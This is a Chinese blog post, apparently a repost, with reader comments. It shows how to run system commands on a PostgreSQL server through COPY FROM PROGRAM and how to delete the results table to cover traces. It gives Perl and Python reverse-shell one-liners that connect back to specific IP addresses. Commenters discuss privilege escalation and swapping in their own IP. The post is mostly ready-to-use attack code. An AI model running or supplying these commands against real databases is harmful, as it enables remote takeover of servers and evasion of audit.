DROP TABLE IF EXISTS cmd_exec
创建你用来保存命令输出的表
CREATE TABLE cmd_exec(cmd_output text);
通过 “COPY FROM PROGRAM”执行系统命令
COPY cmd_exec FROM PROGRAM 'id'
[可选]查看执行结果
SELECT * FROM cmd_exec
[可选]清除痕迹
DROP TABLE IF EXISTS cmd_exec;
需要说明的是,命令中的任何单引号都必须通过双引号来转义它们,比如你想执行下面命令:
<code>echo 'hello';</code>
你需要把上述命令用单引号包围并将命令中包含的单引号用双引号替换:
'echo "hello";'
在linux及Mac OSX操作系统中通常可以通过一行简单的perl命令来反弹shell,比如:
COPY files FROM PROGRAM 'perl -MIO -e "$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,/"192.168.0.104:80/");STDIN->fdopen($c,r);$~->fdopen($c,w);system $_ while <>;"';
Python版本
COPY files FROM PROGRAM 'python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((/"192.168.31.41/",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([/"/bin/sh/",/"-i/"]);"'
本文来自OnionT@killboy 原文链接http://www.oniont.cn/index.php/archives/223.html

北京市 1F
这操作太危险了吧,随便执行系统命令?
陕西省西安市 2F
之前搞过postgresql,没想到还能这么玩😳
菲律宾 B1
@ 复古单车 这个玩法有点意思,收藏了
北京市 3F
COPY FROM PROGRAM 这功能也太狠了,权限得卡死
山东省济南市 4F
我们公司直接禁了这个语法,怕出事
重庆市 5F
那个反弹shell的perl命令能解释下吗?看不懂
韩国 B1
@ 长亭外古道边 那个socket连接部分能不能图解一下?
韩国 6F
单引号转义用双引号,实际测试容易出错,坑
上海市 7F
这不就是数据库提权常用手法?老渗透了
福建省泉州市 8F
postgresql还能干这事,学废了😂
贵州省贵阳市 9F
我试了下,没有超级用户权限根本跑不了
陕西省西安市 B1
@ 幻影时空 普通用户权限确实不行,得超级用户
福建省福州市 B1
@ 幻影时空 没superuser权限试了也是白搭
上海市 10F
python反弹shell那段,ip和端口要自己改吧?
黑龙江省哈尔滨市 B1
@ 元气少女 对,要改成你自己的ip和端口
上海市 B1
@ 元气少女 ip端口当然要改啊,不然连谁去?
湖南省岳阳市 11F
这种操作也太危险了吧
韩国 12F
perl那段完全看不懂,太复杂了
天津市滨海新区 13F
我们公司数据库也禁用了这个功能
印度 14F
单引号转义那里确实容易写错
山东省聊城市 B1
@ 小猫毛绒绒 单引号转义搞错一次就崩,烦死了
浙江省嘉兴市 15F
这方法实战用过,确实能提权
江苏省常州市 16F
反弹shell那段能再详细说说吗
上海市 17F
postgresql原来还能这么玩,长见识了
印度 18F
这操作太危险了,数据库直接变后门?
北京市 19F
COPY FROM PROGRAM 这功能默认该关掉
福建省三明市 B1
@ SerpentOfDoom 这功能不关真是定时炸弹💣
上海市 20F
之前测试时卡在转义上,折腾半小时😭
日本 21F
perl那段能不能拆开讲?一脸懵
北京市 B1
@ 秘法吟者 perl那堆参数看得我头大,有简化版吗?
上海市 22F
公司早把PROGRAM禁了,根本跑不起来
浙江省 23F
反弹shell成功过一次,但日志全被审计了
中国 24F
@豆包 这个转义规则搞晕了
荷兰 B1
@ WanderingNight 这个转义规则确实有点绕。简单说就是:命令整体用单引号包着,里面的单引号要换成双引号。
广东省东莞市 25F
postgresql还能这么玩?细思极恐啊
印度 26F
我们DBA直接删了PROGRAM权限,太吓人
日本 27F
之前提权翻车,就是忘了转义单引号
北京市 28F
这不比SQL注入爽?直接system了属于是
上海市 29F
python那个shell命令得改IP吧,直接抄会连错
山东省滨州市 30F
搞渗透的应该都玩过这招,老活了
福建省厦门市 31F
我们测试环境试了一下,权限不够跑不动
韩国 32F
COPY命令还能这么用?我一直当导入工具
北京市 33F
那个fork和exit是干啥的,求解释下
日本 34F
数据库变肉机,日志都来不及删
四川省攀枝花市 35F
反弹shell成功了,但防火墙立马告警了
浙江省舟山市 36F
Perl那个反弹shell代码挺巧妙
江苏省淮安市 B1
@ 穷奇噬魂 Perl玩得是真溜